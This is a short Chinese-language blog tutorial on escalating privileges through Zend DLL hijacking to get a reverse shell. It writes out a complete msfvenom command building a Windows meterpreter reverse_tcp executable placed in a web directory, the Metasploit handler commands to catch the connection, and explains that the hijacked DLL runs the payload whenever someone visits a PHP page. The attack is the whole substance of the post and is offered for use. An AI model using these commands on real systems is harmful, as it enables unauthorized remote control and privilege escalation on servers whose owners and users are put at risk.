提权教程:zend反弹shell提权

Admin 2020-08-10 48人围观 ,发现0个评论 提权教程

这篇是接着上篇内容所说。

Zend_DLL_Hijacking.exe执行远控
msfconsole 生成反弹shell

生成攻击载荷

msfvenom  -p windows/meterpreter/reverse_tcp lhost=192.168.0.106  lport=12345 -f exe >/var/www/html/s.exe

本地监听

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.106 

set lport 12345

exploit


监听端口

提权教程:zend反弹shell提权 Web安全 第1张

提权工具生成dll

提权教程:zend反弹shell提权 Web安全 第2张

 

当有人访问php网页的时候 就会加载dl

执行我们s.exe 那么 msf 就会监听到一个反弹shell

 提权教程:zend反弹shell提权 Web安全 第3张

请发表您的评论
请关注微信公众号
微信二维码
不容错过
Powered By 蚁人博客